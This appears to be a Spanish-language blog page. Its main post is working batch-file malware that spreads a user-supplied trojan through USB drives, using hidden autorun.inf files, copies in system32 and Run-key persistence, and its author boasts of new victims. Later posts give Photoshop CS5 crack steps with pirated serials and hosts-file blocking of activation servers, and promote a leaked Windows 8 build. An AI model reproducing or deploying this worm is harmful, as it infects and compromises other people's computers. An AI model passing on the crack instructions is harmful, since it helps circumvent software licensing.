Hola amigos, bueno aca les paso el codigo que escribi en batch es sencillo pero efectivo por lo menos a mi me funciona bien
yo lo uso para propagar un troyano por medio de discos removibles.
funciona de la siguiente manera: al conectar un ped driver o cualquier medio removible el codigo se copiara en el para luego ejecutarse en la proxima
maquina donde se conecte.
en el codigo van a apareser dos .exe esos son "propagador.exe" despues le cambias el nombre que vos quieras, y "troyano.exe" ese sera tu codigo malisioso que quieres propagar.
lo unico que vas a nesecitar es un compilador para pasar tu .bat a .exe, yo use "Bat To Exe Converter" que seguro buscando un poco lo encuentran y cumple my bien esa funcion.
bueno pongo el codigo y lo explico un poco:
--------------------------------------------------------------------------- -------------------------------------------------------------------
@echo off
EXPLORER.EXE /E,\
:volver
echo va a mirar si existe propagador.exe
ping -n 15 localhost > nul
IF NOT EXIST D:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST E:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST F:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST G:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST H:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST I:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST J:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST K:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST L:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST M:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST N:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST O:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST P:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST Q:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST R:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST S:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST T:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST U:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST V:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST W:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST X:/propagador.exe (GOTO NOEXISTE)
IF NOT EXIST Y:Ypropagador.exe (GOTO NOEXISTE)
IF NOT EXIST Z:/propagador.exe (GOTO NOEXISTE)
IF EXIST D:/propagador.exe (GOTO volver)
IF EXIST F:/propagador.exe (GOTO volver)
IF EXIST G:/propagador.exe (GOTO volver)
IF EXIST H:/propagador.exe (GOTO volver)
IF EXIST I:/propagador.exe (GOTO volver)
IF EXIST J:/propagador.exe (GOTO volver)
IF EXIST K:/propagador.exe (GOTO volver)
IF EXIST L:/propagador.exe (GOTO volver)
IF EXIST M:/propagador.exe (GOTO volver)
IF EXIST N:/propagador.exe (GOTO volver)
IF EXIST O:/propagador.exe (GOTO volver)
IF EXIST P:/propagador.exe (GOTO volver)
IF EXIST Q:/propagador.exe (GOTO volver)
IF EXIST R:/propagador.exe (GOTO volver)
IF EXIST S:/propagador.exe (GOTO volver)
IF EXIST T:/propagador.exe (GOTO volver)
IF EXIST U:/propagador.exe (GOTO volver)
IF EXIST V:/propagador.exe (GOTO volver)
IF EXIST W:/propagador.exe (GOTO volver)
IF EXIST X:/propagador.exe (GOTO volver)
IF EXIST X:/propagador.exe (GOTO volver)
IF EXIST Y:/propagador.exe (GOTO volver)
IF EXIST Z:/propagador.exe (GOTO volver)
:NOEXISTE
echo no existe... seguimos
ping -n 10 localhost > nul
XCOPY opesys.exe "C:\WINDOWS\system32" /H/Y
XCOPY troyano.exe "C:\WINDOWS\system32" /H/Y
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v opesys /t REG_SZ /d C:\WINDOWS\system32\propagador.exe /f > nul
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v msngms /t REG_SZ /d C:\WINDOWS\system32\troyano.exe /f > nul
:bucle
@echo off
echo espera para crear inf y copiar de sys
ping -n 10 localhost > nul
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (del %%A:\Autorun.inf)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo [Autorun] > %%A:\AutoRun.inf)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo action=Abrir >> %%A:\AutoRun.inf)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo shellexecute= propagador.exe >> %%A:\AutoRun.Inf)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:\AutoRun.inf)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:\propagador.exe)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:\troyano.exe)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (XCOPY "C:\WINDOWS\system32\propagador.exe" "%%A:" /H/Y)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (XCOPY "C:\WINDOWS\system32\troyano.exe" "%%A:" /H/Y)
ping -n 10 localhost > nul
goto volver
--------------------------------------------------------------------------- ----------------------------------------------------
bueno la primera linea: EXPLORER.EXE /E,\ es para que cuando abras el disco removible se abra el explorador normalmente
los echo los puse para ir probando ejecutando el .bat y ver como va funcionando en la ventana de DOS si quieren no lo pongan
los ping -n 15 localhost > nul es para darle un tiempo a cada paso que va realizando el codigo, como para no tarar el equipo
con IF NOT EXIST va a mirar en los discos a partir den D: hasta la Z:, si no existe el propagador.exe si es asi saltara hasta :NO EXISTE y prosedera a copiarlo en cada uno de estos.
osea lo que tenemos que hacer es: en la raiz de un disco, puede ser el mismo removible. colocamos el "troyano.exe" y lo ponemos en modo oculto luego compilamos este codigo "propagador.bat" a "propagador.exe" con el programa: "Bat To Exe Converter" lo colocamos en la raiz junto al "troyano.exe" TAMBIEN EN MODO OCULTO cuando ejecutemos "propagador.exe" estos 2 se copiaran en: C:\WINDOWS\system32 , y de ahí se copiaran en modo oculto a todos los discos que reconozca la maquina desde el D: hasta la Z: tambien se creara en modo oculto el archivo "autorun.inf" que es el que va a ejecutar el gusano cada vez que hagamos doble clik en estos discos.
las dos lineas de modificacion de registro son para ejecutar el gusano cada vez que se inicie el equipo
podran ver que el codigo no ejecuta el troyano cuando se abre, esto es porque cada vez que se abriria el disco se estaria instalando y tardaria mucho tiempo la victima se daria cuenta que a la maquina le pasa algo.
Si lo ejecuta al reiniciar el equipo a partir de ahi ya estara infectado con el troyano
se propaga realmente muy rapido.
cualquier critica, correccion o sugerencia sera bienvenida.
bueno eso es mas o menos todo espero que les sirva a mi me han aparecido nuevas victimas seguro a ustedes tambien.
cualquier cosa comenten chauu!
martes, 10 de mayo de 2011
Photoshop cs 5 full (no portable) y traducido al español
Les dejo una forma de tener el nuevo Photoshop cs 5 full (no portable) y traducido al español
1- Descargar de la pagina oficial el photoshop cs 5 , elegir opcion "try" (les va a pedir que se registren) bajan el intalador doble click y comienza a descargar , cuando instalen eligan la opcion "introducir serial luego" o "probar" (con el crack queda full).
(les dejo para descargarlo de la pagina oficial ya que asi no piensan que esta modificado , esta libre de virus y ademas con mis 3mb de velocidad estaria años subiendolo)
(peso 980 MB)
2-Crack (32 bits) ,descargarlo , descomprimirlo y pegarlo en: X : Program Files-Adobe-Adobe Photoshop CS5 (X unidad donde lo tienen instalado) pueden hacer lo mismo con los otros productos adobe que se instalan para dejarlos full tambien.
DESCARGAR(mediafire)
DESCARGAR(megaupload)
Activacion (64 bits) :
(nota: en la parte que les indica modificar el archivo host si no les deja tienen que hacer lo siguiente : ir a esta ruta C:Windows-System32-drivers-etc , ubica el archivo "host" , click dercho /propiedades y desmarca solo lectura , despues anda a la solapa "seguridad" y toca en "editar" , selecciona tu usuario (de pc) y en las solapas de abajo activalas todas asi tenes permisos para todo. dale aceptar)
1) Ejecutar "Activator.exe" (en Windows Vista ejecutar como Administrador) y cliquear en alguna de las cabezas de los Dragones o Animales señaladas por las flechas rojas. Luego les aparecerá un OK en el rectángulo señalado por la flecha celeste.
2) Abrir el archivo Hosts (C:WindowsSystem32driversetchosts) situado en la carpeta C:WindowsSystem32driversetc .
NOTA: si no lo encuentran vayan a las opciones de carpeta y la pestaña "Ver" marquen la opción para mostrar los archivos y carpetas ocultas.
3) Ir a la última línea y colocar debajo de esta lo siguiente:
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 WWIS-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 adobeereg.com
Luego guardar el archivo.
NOTA: si al intentar guardar el archivo les aparece algún error vayan a las propiedades del archivo (Hosts) y desmarquen la opción "Sólo lectura".
4) Abrir el Photoshop CS5 (32 y/ó 64 bits) y cuando les pida una clave o serial colocar alguno de los siguientes :
serial:1045-1756-0999-0999-3438-3575
serial:1045-1756-2071-0999-3438-3575
Luego le dan en siguiente y cuando les pida el AdobeID omitan el paso.
5) Restart Photoshop & enjoy your activated Photoshop CS5
3-Traduccion ,descargar la traduccion a español (ya que solo se instala en ingles) y pegar la carpeta "es-MX" en : X/Program Files-Adobe-Adobe Photoshop CS5-Locales , despues abrir el photoshop ir a "edicion" , "preferencias" , e "interfaz" , abajo en el rectangulo de idioma elegir español y reiniciar el photoshop.
Descargar Windows 8 Enterprise Build 7959 [64 bits]
Ayer les comentaba que se había filtrado Windows 8 Enterprise Build 7959 (6.2.7959.0.fbl_srv_wdacxml.110307-1930_amd64fre_server) y que en pocas horas ya iba a estar el torrent disponible para descargarlo.
Información de la Build
Nombre: 6.2.7959.0.fbl_srv_wdacxml.110307-1930_amd64fre_server-enterprise_en-us.iso
Tamaño: 2.87GB (3,229,550,592 bytes)
MD5: 99375D7782027CBF2E70F5D0F8648406
Tamaño: 2.87GB (3,229,550,592 bytes)
MD5: 99375D7782027CBF2E70F5D0F8648406
Suscribirse a:
Entradas (Atom)